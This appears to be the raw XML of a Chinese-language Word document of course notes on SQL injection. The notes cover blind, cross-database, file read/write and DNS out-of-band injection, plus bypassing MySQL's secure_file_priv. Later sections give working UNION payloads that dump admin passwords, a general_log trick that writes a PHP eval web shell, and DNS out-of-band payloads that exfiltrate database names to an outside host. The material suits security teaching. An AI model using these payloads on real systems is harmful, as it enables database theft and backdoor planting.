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C9C40" w14:textId="77777777" w:rsidR="002B5806" w:rsidRDefault="002B5806" w:rsidP="002B5806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ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>攻防</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>-SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>注入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高权限判定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跨库查询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文件读写</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&amp;DNS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>带外</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&amp;SecurePriv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>开关绕过</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A830A48" w14:textId="6F2C0E04" w:rsidR="002B5806" w:rsidRDefault="002B5806" w:rsidP="002B5806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F1B6536" wp14:editId="383F4AF9">
            <wp:extent cx="5270500" cy="16446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E4D7D" w14:textId="77777777" w:rsidR="002B5806" w:rsidRDefault="002B5806" w:rsidP="002B5806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产生原理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应用因素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各类数据库类型利用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参数格式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-XML&amp;JSON&amp;BASE64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数字字符搜索等符号绕过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&amp;UA&amp;Cookie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&amp;XFF&amp;Referer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布尔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延时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报错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盲注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高权限用户差异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文件读写带外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OWTOP10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注入，文件安全（上传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包含等），目录遍历，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CRLF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SSTI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XML&amp;XXE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执行（代码或命令等）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反序列化，业务逻辑（验证码，接口枚举，支付购买，机制验证，越权，并发等）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未授权访问，失效访问控制，弱口令安全，第三方组件安全，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CORS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</w:p>
    <w:p w14:paraId="1B5F8C61" w14:textId="5107C862" w:rsidR="002B5806" w:rsidRDefault="002B5806" w:rsidP="002B5806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3906B809" wp14:editId="6A621D37">
            <wp:extent cx="5270500" cy="58483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92228" w14:textId="008E50B5" w:rsidR="002B5806" w:rsidRDefault="002B5806" w:rsidP="002B5806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1CF0EEE" wp14:editId="116C3DDF">
            <wp:extent cx="5274310" cy="2757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025DB" w14:textId="77777777" w:rsidR="002B5806" w:rsidRDefault="002B5806" w:rsidP="002B5806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lastRenderedPageBreak/>
        <w:t>演示案例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72792DC7" w14:textId="77777777" w:rsidR="002B5806" w:rsidRDefault="002B5806" w:rsidP="002B580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-SQL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数据库类型利用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DDE28CD" w14:textId="77777777" w:rsidR="002B5806" w:rsidRDefault="002B5806" w:rsidP="002B580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-SQL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参数类型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符号干扰</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ECFFD8A" w14:textId="77777777" w:rsidR="002B5806" w:rsidRDefault="002B5806" w:rsidP="002B580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-SQL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参数格式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参数编码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3E7265" w14:textId="77777777" w:rsidR="002B5806" w:rsidRDefault="002B5806" w:rsidP="002B580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-SQL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增删改查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无回显报错</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B76FAD" w14:textId="77777777" w:rsidR="002B5806" w:rsidRDefault="002B5806" w:rsidP="002B580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-SQL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-HTTP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头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&amp;UA&amp;Cookie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2243F14D" w14:textId="77777777" w:rsidR="002B5806" w:rsidRDefault="002B5806" w:rsidP="002B580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-SQL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-HTTP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头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&amp;XFF&amp;Referer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="238CEC51" w14:textId="77777777" w:rsidR="002B5806" w:rsidRDefault="002B5806" w:rsidP="002B580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-SQL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布尔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延时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报错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盲注</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7052B4FE" w14:textId="77777777" w:rsidR="002B5806" w:rsidRDefault="002B5806" w:rsidP="002B580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-SQL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高权限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跨库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文件读写</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF65EBF" w14:textId="77777777" w:rsidR="002B5806" w:rsidRDefault="002B5806" w:rsidP="002B580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-SQL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高权限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文件读写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带外</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199DA393" w14:textId="77777777" w:rsidR="002B5806" w:rsidRDefault="002B5806" w:rsidP="002B5806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数据库知识：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、数据库名，表名，列名，数据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、自带数据库，数据库用户及权限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、数据库敏感函数，默认端口及应用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、数据库查询方法（增加删除修改更新）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#SQL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注入产生原理：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代码中执行的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语句存在可控变量导致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影响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注入的主要因素：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、数据库类型（权限操作）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、数据操作方法（增删改查）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、参数数据类型（符号干扰）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、参数数据格式（加密编码等）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、提交数据方式（数据包部分）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、有无数据处理（无回显逻辑等）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常见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注入的利用过程：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、判断数据库类型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、判断参数类型及格式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、判断数据格式及提交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、判断数据回显及防护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lastRenderedPageBreak/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、获取数据库名，表名，列名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、获取对应数据及尝试其他利用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黑盒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白盒如何发现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注入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、盲对所有参数进行测试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、整合功能点脑补进行测试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白盒参考后期代码审计课程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利用过程：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获取数据库名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表名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列名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数据（一般是关键数据，如管理员）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案例说明：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在应用中，数据库用户不同，可操作的数据库和文件读写权限不一，所有在注入过程中可以有更多的利用思路，如直接写入后门，获取数据库下洽谈网站的数据等。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实验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root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用户和普通用户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、文件读写操作权限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、所有数据库名获取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实验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secure_file_priv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开关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show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variables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like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"secure%"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my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ini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windows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my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cnf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Linux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中设置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secure_file_priv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MySQL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中的系统变量，用于限制文件的读取和写入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绕过条件：存在可执行的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地方（后台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命令执行，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Phpmyadmin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从后台的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命令执行功能点：注入获取得到这个网站的后台账号密码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phpmyadmin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命令执行功能点：注入获取到数据库的用户名和密码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mysql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数据库下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user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password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authentication_string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slow_query_log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（启用慢查询日志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默认禁用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show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variables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like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'general_log'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global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general_log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on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global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general_log_file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'D:/phpstudy_pro/WWW/php/55/bypass.php'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'&lt;?php @eval($_POST[x]);?&gt;'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跨库注入：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查数据库名：</w:t>
      </w:r>
      <w:r>
        <w:br/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 union select SCHEMA_name,2,3 from information_schema.SCHEMATA#</w:t>
      </w:r>
      <w:r>
        <w:br/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查表名：</w:t>
      </w:r>
      <w:r>
        <w:br/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table_name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information_schema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tables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where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table_schema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'aicms'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查列名：</w:t>
      </w:r>
      <w:r>
        <w:br/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 union select column_name,2,3 from information_schema.columns where table_name='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wolive_admin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'#</w:t>
      </w:r>
      <w:r>
        <w:br/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查数据：</w:t>
      </w:r>
      <w:r>
        <w:br/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username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aicms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wolive_admin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br/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lastRenderedPageBreak/>
        <w:t>' union select password,2,3 from aicms.wolive_admin#</w:t>
      </w:r>
      <w:r>
        <w:br/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文件操作：</w:t>
      </w:r>
      <w:r>
        <w:br/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关于网站路径获取方法：</w:t>
      </w:r>
      <w:r>
        <w:br/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、遗留文件</w:t>
      </w:r>
      <w:r>
        <w:br/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、报错显示</w:t>
      </w:r>
      <w:r>
        <w:br/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、读中间件配置</w:t>
      </w:r>
      <w:r>
        <w:br/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、爆破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fuzz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路径</w:t>
      </w:r>
      <w:r>
        <w:br/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LOAD_FILE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'd:\\1.txt'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br/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 union select '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xxxx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',2,3 into outfile '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d:\\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txt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'#</w:t>
      </w:r>
      <w:r>
        <w:br/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带外注入：</w:t>
      </w:r>
      <w:r>
        <w:br/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查数据名：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load_file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concat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'\\\\'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,(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database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()),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'.yjjoxijrhw.yutu.eu.org\\aa'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)),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查表名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 union select load_file(concat("\\\\",(select table_name from information_schema.tables where table_schema='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news_management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 limit 0,1 ),".yjjoxijrhw.yutu.eu.org\\xxx.txt")),2,3#</w:t>
      </w:r>
      <w:r>
        <w:br/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查表名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load_file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concat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"\\\\"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,(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table_name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information_schema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tables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where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table_schema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'news_management'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limit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),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".yjjoxijrhw.yutu.eu.org\\xxx.txt"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)),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查列名：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.......</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F98FE3E" w14:textId="77777777" w:rsidR="002B5806" w:rsidRDefault="002B5806" w:rsidP="002B5806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8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3B5E6112" w14:textId="77777777" w:rsidR="002B5806" w:rsidRDefault="002B5806" w:rsidP="002B5806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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26917215" w14:textId="77777777" w:rsidR="0017059F" w:rsidRDefault="0017059F"/>
    <w:sectPr w:rsidR="00170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D1F31"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BE2AFA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8F"/>
    <w:rsid w:val="0017059F"/>
    <w:rsid w:val="002B5806"/>
    <w:rsid w:val="00D1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F947A-7B7D-4335-A55E-2045E044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2B5806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B58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580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B5806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B58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q.com/doc/DQ3Z6RkNpaUtMcE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2025-03-14T08:26:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-03-14T08:26:00Z</dcterms:modified>
</cp:coreProperties>
</file>